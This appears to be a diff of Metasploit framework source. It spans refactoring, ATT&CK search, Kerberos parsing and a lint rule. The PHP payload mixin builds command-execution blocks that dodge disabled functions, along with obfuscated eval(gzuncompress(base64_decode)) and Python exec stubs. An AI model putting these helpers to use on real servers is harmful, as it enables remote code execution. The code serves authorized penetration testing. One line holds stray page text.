+        T1673_VIRTUAL_MACHINE_DISCOVERY = 'T1673'
+
+        T1674_INPUT_INJECTION = 'T1674'
+
+        T1675_ESXI_ADMINISTRATION_COMMAND = 'T1675'
+      end
+    end
+  end
+end
@@ -114,7 +114,6 @@ module Msf
      @module_info_copy = info.dup

      self.module_info = info
-      generate_uuid

      set_defaults

@@ -1,4 +1,3 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-

 #
@@ -7,8 +6,6 @@
 # of Msf::Module::Platform objects.  It also supports ranges based on relative
 # ranks...
 #
-
-
 class Msf::Module::PlatformList
  attr_accessor :platforms

@@ -32,88 +29,85 @@ class Msf::Module::PlatformList
  # Create an instance from an array
  #
  def self.from_a(ary)
-    self.new(*ary)
+    new(*ary)
  end

  def index(needle)
-    self.platforms.index(needle)
+    platforms.index(needle)
  end

  #
-  # Constructor, takes the entries are arguments
+  # Constructor, takes the entries as arguments
  #
  def initialize(*args)
-    self.platforms = [ ]
+    self.platforms = []

-    args.each { |a|
-      if a.kind_of?(String)
+    args.each do |a|
+      if a.is_a?(String)
        platforms << Msf::Module::Platform.find_platform(a)
-      elsif a.kind_of?(Range)
-        b = Msf::Module::Platform.find_platform(a.begin)
-        e = Msf::Module::Platform.find_platform(a.end)
+      elsif a.is_a?(Range)
+        a_begin = Msf::Module::Platform.find_platform(a.begin)
+        a_end = Msf::Module::Platform.find_platform(a.end)
+        range = (a_begin::Rank..a_end::Rank)

-        children = b.superclass.find_children
-        r        = (b::Rank .. e::Rank)
-        children.each { |c|
-          platforms << c if r.include?(c::Rank)
-        }
+        a_begin.superclass.find_children.each do |c|
+          platforms << c if range.include?(c::Rank)
+        end
      else
        platforms << a
      end
-
-    }
-
+    end
  end

  #
  # Checks to see if the platform list is empty.
  #
  def empty?
-    return platforms.empty?
+    platforms.empty?
  end

  #
  # Returns an array of names contained within this platform list.
  #
  def names
-    platforms.map { |m| m.realname }
+    platforms.map(&:realname)
  end

  #
  # Symbolic check to see if this platform list represents 'all' platforms.
  #
  def all?
-    names.include? ''
+    names.include?('')
  end

  #
-  # Do I support plist (do I support all of they support?)
+  # Do I support platform list (do I support all of they support?)
  # use for matching say, an exploit and a payload
  #
-  def supports?(plist)
-    plist.platforms.each { |pl|
+  def supports?(platform_list)
+    platform_list.platforms.each do |pl|
      supported = false
-      platforms.each { |p|
+      platforms.each do |p|
        if p >= pl
          supported = true
          break
        end
-      }
-      return false if !supported
-    }
+      end
+      return false unless supported
+    end

-    return true
+    true
  end

  #
  # used for say, building a payload from a stage and stager
  # finds common subarchitectures between the arguments
  #
-  def &(plist)
+  def &(other)
    l1 = platforms
-    l2 = plist.platforms
+    l2 = other.platforms
    total = l1.find_all { |m| l2.find { |mm| m <= mm } } |
-          l2.find_all { |m| l1.find { |mm| m <= mm } }
+            l2.find_all { |m| l1.find { |mm| m <= mm } }
    Msf::Module::PlatformList.from_a(total)
  end
 end
@@ -120,6 +120,11 @@ class Msf::Module::SiteReference < Msf::Module::Reference
      self.site = "Logo: #{in_ctx_val}"
    elsif in_ctx_id == 'SOUNDTRACK'
      self.site = "Soundtrack: #{in_ctx_val}"
+    elsif in_ctx_id == 'ATT&CK'
+      match = in_ctx_val.match(/\A(?<category>[A-Z]+)(?<id>[\d.]+)\z/)
+      path = Msf::Mitre::Attack::Categories::PATHS[match[:category]]
+      id_path = match[:id].gsub('.', '/')
+      self.site = "https://attack.mitre.org/#{path}/#{match[:category]}#{id_path}/"
    else
      self.site  = in_ctx_id
      self.site += " (#{in_ctx_val})" if (in_ctx_val)
@@ -1,13 +1,18 @@
-require 'rex/text'
-
+# NOTE: Metasploit does not use real UUIDs currently.
+# To modify this to be a real UUID we will need to do a database migration.
+# See: https://github.com/rapid7/metasploit-framework/pull/20170
 module Msf::Module::UUID
+  UUID_CHARS = [*('a'..'z'), *('0'..'9')].freeze
+  private_constant :UUID_CHARS
+
  #
  # Attributes
  #

-  # @!attribute [r] uuid
-  #   A unique identifier for this module instance
-  attr_reader :uuid
+  # @return [String] A unique identifier for this module instance
+  def uuid
+    @uuid ||= UUID_CHARS.sample(8).join
+  end

  protected

@@ -17,13 +22,4 @@ module Msf::Module::UUID

  # @!attribute [w] uuid
  attr_writer :uuid
-
-
-  #
-  # Instance Methods
-  #
-
-  def generate_uuid
-    self.uuid = Rex::Text.rand_text_alphanumeric(8).downcase
-  end
 end
@@ -12,6 +12,8 @@ module Msf::Modules::Metadata::Search
      adapter
      aka
      arch
+      attack
+      att&ck
      author
      authors
      bid
@@ -183,13 +185,16 @@ module Msf::Modules::Metadata::Search
            when 'arch'
              match = [keyword, search_term] if module_metadata.arch =~ regex
            when 'cve'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^cve\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('cve-') && ref =~ regex }
+            when 'att&ck', 'attack'
+              regex = Regexp.new("\\A#{Regexp.escape(search_term)}(\\.\\d+)*\\Z", Regexp::IGNORECASE)
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('att&ck-') && ref.downcase.delete_prefix('att&ck-') =~ regex }
            when 'osvdb'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^osvdb\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('osvdb-') && ref =~ regex }
            when 'bid'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^bid\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('bid-') && ref =~ regex }
            when 'edb'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^edb\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('edb-') && ref =~ regex }
            when 'check'
              if module_metadata.check
                matches_check = %w(true yes).any? { |val| val =~ regex}
@@ -16,15 +16,16 @@ module Msf::Payload::Php
  #
  # @return [String] A chunk of PHP code
  #
-  def php_preamble(options = {})
-    dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    dis = '$' + dis if (dis[0,1] != '$')
+  def self.preamble(options = {})
+    vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }

-    @dis = dis
+    dis = options[:disabled_varname] || vars[:disabled_varname]
+    dis = "$#{dis}" unless dis.start_with?('$')

    # Canonicalize the list of disabled functions to facilitate choosing a
    # system-like function later.
-    preamble = "/*<?php /**/
+    <<~TEXT
+      /*<?php /**/
      @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
      #{dis}=@ini_get('disable_functions');
      if(!empty(#{dis})){
@@ -34,8 +35,11 @@ module Msf::Payload::Php
      }else{
        #{dis}=array();
      }
-      "
-    return preamble
+    TEXT
+  end
+
+  def php_preamble(options = {})
+    Msf::Payload::Php.preamble(options)
  end

  #
@@ -52,54 +56,62 @@ module Msf::Payload::Php
  # @return [String] A chunk of PHP code that, with a little luck, will run a
  #   command.
  #
-  def php_system_block(options = {})
-    cmd = options[:cmd_varname] || '$cmd'
-    dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    output = options[:output_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+  def self.system_block(options = {})
+    vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }

-    if (@dis.nil?)
-      @dis = dis
+    cmd = options[:cmd_varname] || vars[:cmd_varname]
+    dis = options[:disabled_varname] || vars[:disabled_varname]
+    output = options[:output_varname] || vars[:output_varname]
+
+    cmd    = '$' + cmd unless cmd.start_with?('$')
+    dis    = '$' + dis unless dis.start_with?('$')
+    output = '$' + output unless output.start_with?('$')
+
+    is_callable = vars[:is_callable_varname]
+    in_array    = vars[:in_array_varname]
+
+    setup = ''
+    if options[:cmd]
+      setup << <<~TEXT
+        #{cmd}=base64_decode('#{Rex::Text.encode_base64(options[:cmd])}');
+      TEXT
    end
-
-    cmd    = '$' + cmd if (cmd[0,1] != '$')
-    dis    = '$' + dis if (dis[0,1] != '$')
-    output = '$' + output if (output[0,1] != '$')
-
-    is_callable = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    in_array    = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-
-    setup = "
+    setup << <<~TEXT
      if (FALSE!==stristr(PHP_OS,'win')){
        #{cmd}=#{cmd}.\" 2>&1\\n\";
      }
      #{is_callable}='is_callable';
      #{in_array}='in_array';
-      "
-    shell_exec = "
+    TEXT
+    shell_exec = <<~TEXT
      if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){
        #{output}=`#{cmd}`;
-      }else"
-    passthru = "
+      }else
+    TEXT
+    passthru = <<~TEXT
      if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){
        ob_start();
        passthru(#{cmd});
        #{output}=ob_get_contents();
        ob_end_clean();
-      }else"
-    system = "
+      }else
+    TEXT
+    system = <<~TEXT
      if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){
        ob_start();
        system(#{cmd});
        #{output}=ob_get_contents();
        ob_end_clean();
-      }else"
-    exec = "
+      }else
+    TEXT
+    exec = <<~TEXT
      if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){
        #{output}=array();
        exec(#{cmd},#{output});
        #{output}=join(chr(10),#{output}).chr(10);
-      }else"
-    proc_open = "
+      }else
+    TEXT
+    proc_open = <<~TEXT
      if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){
        $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
        #{output}=NULL;
@@ -107,8 +119,9 @@ module Msf::Payload::Php
          #{output}.=fread($pipes[1],1024);
        }
        @proc_close($handle);
-      }else"
-    popen = "
+      }else
+    TEXT
+    popen = <<~TEXT
      if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){
        $fp=popen(#{cmd},'r');
        #{output}=NULL;
@@ -118,7 +131,8 @@ module Msf::Payload::Php
          }
        }
        @pclose($fp);
-      }else"
+      }else
+    TEXT
    # Currently unused until we can figure out how to get output with COM
    # objects (which are not subject to safe mode restrictions) instead of
    # PHP functions.
@@ -128,17 +142,38 @@ module Msf::Payload::Php
    #		$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
    #		#{output} = file_get_contents('%TEMP%\\out.txt');
    #	}else"
-    fail_block = "
+    fail_block = <<~TEXT
      {
        #{output}=0;
      }
-    "
+    TEXT

    exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
    exec_methods = exec_methods.shuffle
-    buf = setup + exec_methods.join("") + fail_block
-
-    return buf
-
+    setup + exec_methods.join("") + fail_block
  end
+
+  def php_system_block(options = {})
+    Msf::Payload::Php.system_block(options)
+  end
+
+  def php_exec_cmd(cmd)
+    vars = Rex::RandomIdentifier::Generator.new(language: :php)
+    <<-END_OF_PHP_CODE
+      #{php_preamble(vars_generator: vars)}
+      #{php_system_block(vars_generator: vars, cmd: cmd)}
+    END_OF_PHP_CODE
+  end
+
+  def self.create_exec_stub(php_code, options = {})
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
+    b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));"
+    b64_stub = "<?php #{b64_stub} ?>" if options.fetch(:wrap_in_tags, true)
+    b64_stub
+  end
+
+  def php_create_exec_stub(php_code)
+    Msf::Payload::PHP.create_exec_stub(php_code)
+  end
+
 end
@@ -8,18 +8,18 @@ module Msf::Payload::Python
  # one line and compatible with all Python versions supported by the Python
  # Meterpreter stage.
  #
-  # @param cmd [String] The python code to execute.
+  # @param python_code [String] The python code to execute.
  # @return [String] Full python stub to execute the command.
  #
-  def self.create_exec_stub(cmd)
+  def self.create_exec_stub(python_code)
    # Encoding is required in order to handle Python's formatting
-    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(cmd))
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(python_code))
    b64_stub = "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{payload}')[0])))"
    b64_stub
  end

-  def py_create_exec_stub(cmd)
-    Msf::Payload::Python.create_exec_stub(cmd)
+  def py_create_exec_stub(python_code)
+    Msf::Payload::Python.create_exec_stub(python_code)
  end

 end
@@ -1059,7 +1059,8 @@ class Db
    [ '-R', '--rhosts' ] => [ false, 'Set RHOSTS from the results of the search.' ],
    [ '-S', '--search' ] => [ true, 'Search string to filter by.', '<filter>' ],
    [ '-i', '--info' ] => [ false, 'Display vuln information.' ],
-    [ '-d', '--delete' ] => [ false, 'Delete vulnerabilities. Not officially supported.' ]
+    [ '-d', '--delete' ] => [ false, 'Delete vulnerabilities. Not officially supported.' ],
+    [ '-v', '--verbose' ] => [ false, 'Display additional information.' ]
  )

  def cmd_vulns(*args)
@@ -1073,6 +1074,7 @@ class Db

    search_term = nil
    show_info   = false
+    show_vuln_attempts = false
    set_rhosts  = false
    output_file = nil
    delete_count = 0
@@ -1111,6 +1113,8 @@ class Db
        search_term = val
      when '-i', '--info'
        show_info = true
+      when '-v', '--verbose'
+        show_vuln_attempts = true
      else
        # Anything that wasn't an option is a host to search for
        unless (arg_host_range(val, host_ranges))
@@ -1182,11 +1186,20 @@ class Db
    end

    if output_file
-      File.write(output_file, tbl.to_csv)
-      print_status("Wrote vulnerability information to #{output_file}")
+      if show_vuln_attempts
+        print_warning("Cannot output to a file when verbose mode is enabled. Please remove verbose flag and try again.")
+      else
+        File.write(output_file, tbl.to_csv)
+        print_status("Wrote vulnerability information to #{output_file}")
+      end
    else
      print_line
-      print_line(tbl.to_s)
+      if show_vuln_attempts
+        vulns_and_attempts = _format_vulns_and_vuln_attempts(vulns)
+        _print_vulns_and_attempts(vulns_and_attempts)
+      else
+        print_line(tbl.to_s)
+      end
    end

    # Finally, handle the case where the user wants the resulting list
@@ -2347,6 +2360,50 @@ class Db
    end
  end

+  def _format_vulns_and_vuln_attempts(vulns)
+    vulns.map.with_index do |vuln, index|
+      vuln_formatted = <<~EOF.strip.indent(2)
+        #{index}. Vuln ID: #{vuln.id}
+           Timestamp: #{vuln.created_at}
+           Host: #{vuln.host.address}
+           Name: #{vuln.name}
+           References: #{vuln.refs.map {|r| r.name}.join(',')}
+           Information: #{_format_vuln_value(vuln.info)}
+      EOF
+
+      vuln_attempts_formatted = vuln.vuln_attempts.map.with_index do |vuln_attempt, i|
+        <<~EOF.strip.indent(5)
+          #{i}. ID: #{vuln_attempt.id}
+             Vuln ID: #{vuln_attempt.vuln_id}
+             Timestamp: #{vuln_attempt.attempted_at}
+             Exploit: #{vuln_attempt.exploited}
+             Fail reason: #{_format_vuln_value(vuln_attempt.fail_reason)}
+             Username: #{vuln_attempt.username}
+             Module: #{vuln_attempt.module}
+             Session ID: #{_format_vuln_value(vuln_attempt.session_id)}
+             Loot ID: #{_format_vuln_value(vuln_attempt.loot_id)}
+             Fail Detail: #{_format_vuln_value(vuln_attempt.fail_detail)}
+        EOF
+      end
+
+      { :vuln => vuln_formatted, :vuln_attempts => vuln_attempts_formatted }
+    end
+  end
+
+  def _print_vulns_and_attempts(vulns_and_attempts)
+    print_line("Vulnerabilities\n===============")
+    vulns_and_attempts.each do |vuln_and_attempt|
+      print_line(vuln_and_attempt[:vuln])
+      print_line("Vuln attempts:".indent(5))
+      vuln_and_attempt[:vuln_attempts].each do |attempt|
+        print_line(attempt)
+      end
+    end
+  end
+
+  def _format_vuln_value(s)
+    s.blank? ? s.inspect  : s.to_s
+  end
 end

 end end end end
@@ -380,20 +380,22 @@ module Msf
            print_line
            print_line "Keywords:"
            {
+              'action'      => 'Modules with a matching action name or description',
              'adapter'     => 'Modules with a matching adapter reference name',
              'aka'         => 'Modules with a matching AKA (also-known-as) name',
-              'author'      => 'Modules written by this author',
              'arch'        => 'Modules affecting this architecture',
+              'att&ck'      => 'Modules with a matching MITRE ATT&CK ID or reference',
+              'author'      => 'Modules written by this author',
              'bid'         => 'Modules with a matching Bugtraq ID',
-              'osvdb'       => 'Modules with a matching OSVDB ID',
-              'cve'         => 'Modules with a matching CVE ID',
-              'edb'         => 'Modules with a matching Exploit-DB ID',
              'check'       => 'Modules that support the \'check\' method',
+              'cve'         => 'Modules with a matching CVE ID',
              'date'        => 'Modules with a matching disclosure date',
              'description' => 'Modules with a matching description',
+              'edb'         => 'Modules with a matching Exploit-DB ID',
              'fullname'    => 'Modules with a matching full name',
              'mod_time'    => 'Modules with a matching modification date',
              'name'        => 'Modules with a matching descriptive name',
+              'osvdb'       => 'Modules with a matching OSVDB ID',
              'path'        => 'Modules with a matching path',
              'platform'    => 'Modules affecting this platform',
              'port'        => 'Modules with a matching port',
@@ -405,7 +407,6 @@ module Msf
              'stager'      => 'Modules with a matching stager reference name',
              'target'      => 'Modules affecting this target',
              'type'        => 'Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)',
-              'action'      => 'Modules with a matching action name or description',
            }.each_pair do |keyword, description|
              print_line "  #{keyword.ljust 17}:  #{description}"
            end
@@ -428,6 +429,7 @@ module Msf
            print_line "  search cve:2009 type:exploit platform:-linux"
            print_line "  search cve:2009 -s name"
            print_line "  search type:exploit -s type -r"
+            print_line "  search att&ck:T1059"
            print_line
          end

@@ -1232,6 +1232,16 @@ require 'digest/sha1'
    to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
  end

+  # self.to_linux_ppc64_elf
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_ppc64_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true)
+  end
  # self.to_linux_mipsle_elf
  # Little Endian
  # @param framework [Msf::Framework]
@@ -2178,6 +2188,8 @@ require 'digest/sha1'
          to_linux_x64_elf(framework, code, exeopts)
        when ARCH_AARCH64
          to_linux_aarch64_elf(framework, code, exeopts)
+        when ARCH_PPC64
+          to_linux_ppc64_elf(framework, code, exeopts)
        when ARCH_ARMLE
          to_linux_armle_elf(framework, code, exeopts)
        when ARCH_MIPSBE
@@ -51,7 +51,9 @@ module Rex
          NT_UID = 5
        end

-        # From padata - https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml
+        # See:
+        # * https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#pre-authentication
+        # * https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/ae60c948-fda8-45c2-b1d1-a71b484dd1f7

        module PreAuthType
          PA_TGS_REQ = 1
@@ -65,6 +67,7 @@ module Rex
          PA_FOR_USER = 129
          PA_SUPPORTED_ETYPES = 165
          PA_PAC_OPTIONS = 167
+          KERB_SUPERSEDED_BY_USER = 170
        end

        module AuthorizationDataType
@@ -171,6 +171,19 @@ module Rex
                now = Time.now
                skew = (res.stime - now).abs.to_i
                return "#{error_code}. Local time: #{now}, Server time: #{res.stime}, off by #{skew} seconds"
+              elsif error_code == ErrorCodes::KDC_ERR_CLIENT_REVOKED && res&.respond_to?(:e_data) && res.e_data.present?
+                begin
+                  pa_datas = res.e_data_as_pa_data
+                rescue OpenSSL::ASN1::ASN1Error
+                else
+                  pa_data_entry = pa_datas.find do |pa_data|
+                    pa_data.type == Rex::Proto::Kerberos::Model::PreAuthType::KERB_SUPERSEDED_BY_USER
+                  end
+
+                  if pa_data_entry
+                    error_code = "#{error_code}. This account has been superseded by #{pa_data_entry.decoded_value}."
+                  end
+                end
              end

              "Kerberos Error - #{error_code}"
@@ -0,0 +1,85 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class provides a representation of a Kerberos KERB-SUPERSEDED-BY-USER
+        # message as defined in [MS-KILE 2.2.13](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/79170b21-ad15-4a1b-99c4-84b3992d9e70).
+        class KerbSupersededByUser < Element
+
+          attr_accessor :principal_name
+
+          attr_accessor :realm
+
+          def ==(other)
+            realm == other.realm && principal_name == other.principal_name
+          end
+
+          def to_s
+            "#{principal_name}@#{realm}"
+          end
+
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::Sequence
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode KerbSupersededByUser, invalid input'
+            end
+
+            self
+          end
+
+          def encode
+            principal_name_asn1 = OpenSSL::ASN1::ASN1Data.new([encode_principal_name], 1, :CONTEXT_SPECIFIC)
+            realm_asn1 = OpenSSL::ASN1::ASN1Data.new([encode_realm], 2, :CONTEXT_SPECIFIC)
+            seq = OpenSSL::ASN1::Sequence.new([principal_name_asn1, realm_asn1])
+
+            seq.to_der
+          end
+
+          private
+
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+
+            decode_asn1(asn1)
+          end
+
+          # Decodes a Rex::Proto::Kerberos::Model::KerbSupersededByUser from an
+          # OpenSSL::ASN1::Sequence
+          #
+          # @param input [OpenSSL::ASN1::Sequence] the input to decode from
+          def decode_asn1(input)
+            seq_values = input.value
+            self.principal_name = decode_principal_name(seq_values[0])
+            self.realm = decode_realm(seq_values[1])
+          end
+
+         def decode_principal_name(input)
+           PrincipalName.decode(input.value[0])
+          end
+
+          # Decodes the realm from an OpenSSL::ASN1::ASN1Data
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [Array<String>]
+          def decode_realm(input)
+            input.value[0].value
+          end
+
+          def encode_principal_name
+            self.principal_name.encode
+          end
+
+          def encode_realm
+            OpenSSL::ASN1::OctetString.new(self.realm)
+          end
+        end
+      end
+    end
+  end
+end
@@ -72,32 +72,26 @@ module Rex
            raise ::NotImplementedError, 'KrbError encoding not supported'
          end

-          # Decodes the e_data field as an Array<PreAuthDataEntry>
+          # Decodes the e_data field as an Array<PreAuthDataEntry>.
          #
          # @return [Array<Rex::Proto::Kerberos::Model::PreAuthDataEntry>]
          def e_data_as_pa_data
+            return [] unless self.e_data
+
            pre_auth = []
            decoded = OpenSSL::ASN1.decode(self.e_data)
-            decoded.each do |pre_auth_data|
-              pre_auth << Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(pre_auth_data)
+
+            if decoded.first.tag_class == :UNIVERSAL && decoded.first.tag == 16
+              decoded.each do |pre_auth_data|
+                pre_auth << Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(pre_auth_data)
+              end
+            else
+              pre_auth << Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(decoded)
            end

            pre_auth
          end

-          # Decodes the e_data field as a PreAuthData
-          #
-          # @return [Rex::Proto::Kerberos::Model::PreAuthData]
-          def e_data_as_pa_data_entry
-            if self.e_data
-              decoded = OpenSSL::ASN1.decode(self.e_data)
-              Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(decoded)
-            else
-              # This is implementation-defined, so may be different in some cases
-              nil
-            end
-          end
-
          private

          # Decodes a Rex::Proto::Kerberos::Model::KrbError from an String
@@ -76,6 +76,9 @@ module Rex
            when Rex::Proto::Kerberos::Model::PreAuthType::PA_FOR_USER
              decoded = OpenSSL::ASN1.decode(self.value)
              PreAuthForUser.decode(decoded)
+            when Rex::Proto::Kerberos::Model::PreAuthType::KERB_SUPERSEDED_BY_USER
+              decoded = OpenSSL::ASN1.decode(self.value)
+              KerbSupersededByUser.decode(decoded)
            else
              # Unknown type - just ignore for now
            end
@@ -0,0 +1,90 @@
+# frozen_string_literal: trueAdd commentMore actions
+
+module RuboCop
+  module Cop
+    module Lint
+      # Checks for leading or trailing whitespace in Metasploit module metadata keys/values
+      # inside the initialize method. Recursively checks all hash and array values, except for
+      # keys listed in EXEMPT_KEYS.
+      #
+      # EXEMPT_KEYS can be extended to skip additional metadata fields as needed.
+      #
+      # @example
+      #   # bad
+      #   'Name' => ' value '
+      #   'Author' => [' hd']
+      #
+      #   # good
+      #   'Name' => 'value'
+      #   'Author' => ['hd']
+      class DetectMetadataTrailingLeadingWhitespace < Base
+        extend AutoCorrector
+        MSG = 'Metadata key or value has leading or trailing whitespace.'
+        EXEMPT_KEYS = %w[Description Payload BadChars].freeze
+
+        # Called for every method definition node
+        # Only processes the initialize method
+        # @param node [RuboCop::AST::DefNode]
+        def on_def(node)
+          return unless node.method_name == :initialize
+
+          node.each_descendant(:hash) do |hash_node|
+            hash_node.pairs.each do |pair|
+              key = extract_string(pair.key)
+              next if key && EXEMPT_KEYS.any? { |exempt| key.casecmp?(exempt) }
+              check_value(pair.value)
+              if key && (key != key.strip)
+                add_offense(pair.key, message: MSG) do |corrector|
+                  corrector.replace(pair.key.loc.expression, key.strip.inspect)
+                end
+              end
+            end
+          end
+        end
+
+        private
+
+        # Recursively checks a value node for whitespace issues
+        # @param node [RuboCop::AST::Node]
+        def check_value(node)
+          case node.type
+          when :str, :dstr
+            value = extract_string(node)
+            if value && value != value.strip
+              add_offense(node, message: MSG) do |corrector|
+                replacement = node.sym_type? ? ":#{value.strip}" : value.strip.inspect
+                corrector.replace(node.loc.expression, replacement)
+              end
+            end
+          when :array
+            node.children.each { |child| check_value(child) }
+          when :hash
+            node.pairs.each do |pair|
+              key = extract_string(pair.key)
+              next if key && EXEMPT_KEYS.any? { |exempt| key.casecmp?(exempt) }
+              if key && key != key.strip
+                add_offense(pair.key, message: MSG) do |corrector|
+                  corrector.replace(pair.key.loc.expression, key.strip.inspect)
+                end
+              end
+              check_value(pair.value)
+            end
+          end
+        end
+
+        # Extracts the string value from a node (handles str, sym, dstr)
+        # @param node [RuboCop::AST::Node]
+        # @return [String, nil]
+        def extract_string(node)
+          return unless node
+          if node.str_type? || node.sym_type?
+            node.value.to_s
+          elsif node.dstr_type?
+            # For dynamic strings, join all child string values
+            node.children.map { |c| c.is_a?(Parser::AST::Node) ? extract_string(c) : c.to_s }.join
+          end
+        end
+      end
+    end
+  end
+end
@@ -76,7 +76,7 @@ Gem::Specification.new do |spec|
  # Needed for Meterpreter
  spec.add_runtime_dependency 'metasploit-payloads', '2.0.221'
  # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.35'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.42'
  # Needed by msfgui and other rpc components
  # Locked until build env can handle newer version. See: https://github.com/msgpack/msgpack-ruby/issues/334
  spec.add_runtime_dependency 'msgpack', '~> 1.6.0'
@@ -271,6 +271,7 @@ Gem::Specification.new do |spec|
    mutex_m
    ostruct
    rinda
+    syslog
  ].each do |library|
    spec.add_runtime_dependency library
  end
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Auxiliary
      )
    ])

-    deregister_options('CERT_TEMPLATE', 'ALT_DNS', 'ALT_UPN', 'PFX', 'ON_BEHALF_OF', 'SMBUser', 'SMBPass', 'SMBDomain')
+    deregister_options('CERT_TEMPLATE', 'ALT_DNS', 'ALT_UPN', 'PFX', 'ON_BEHALF_OF', 'SMBUser', 'SMBPass', 'SMBDomain', 'LDAPUsername', 'LDAPPassword', 'LDAPDomain')
  end

  def run
@@ -170,10 +170,10 @@ class MetasploitModule < Msf::Auxiliary
      end
      opts = {
        tree: tree,
-        computer_name: computer_info&.name
+        account_name: computer_info&.name
      }
      begin
-        delete_account(opts) if opts[:tree] && opts[:computer_name]
+        delete_account(opts) if opts[:tree] && opts[:account_name]
      rescue MsSamrUnknownError => e
        print_warning("Unable to delete the computer account, this will have to be done manually with an Administrator account (#{e.message})")
      end
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2024-07-20',
        'DefaultOptions' => {
          'RPORT' => 8443,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2023-11-27',
        'DefaultOptions' => {
          'RPORT' => 30443,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2024-08-05',
        'DefaultOptions' => {
          'RPORT' => 9090,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2024-08-29',
        'DefaultOptions' => {
          'RPORT' => 443,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
          The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set
          wordpress administration options by overwriting values within the database.

-          The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized
+          The vulnerability is present in WordPress's admin-ajax.php, which allows unauthorized
          users to trigger handlers and make configuration changes because of a failure to do
          capability checks when executing the 'save_setting' internal action.

@@ -22,9 +22,9 @@ class MetasploitModule < Msf::Auxiliary
        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
        'License' => MSF_LICENSE,
        'Notes' => {
-           'Stability' => [CRASH_SAFE],
-           'SideEffects' => [IOC_IN_LOGS],
-           'Reliability' => []
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
        }
      )
    )
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
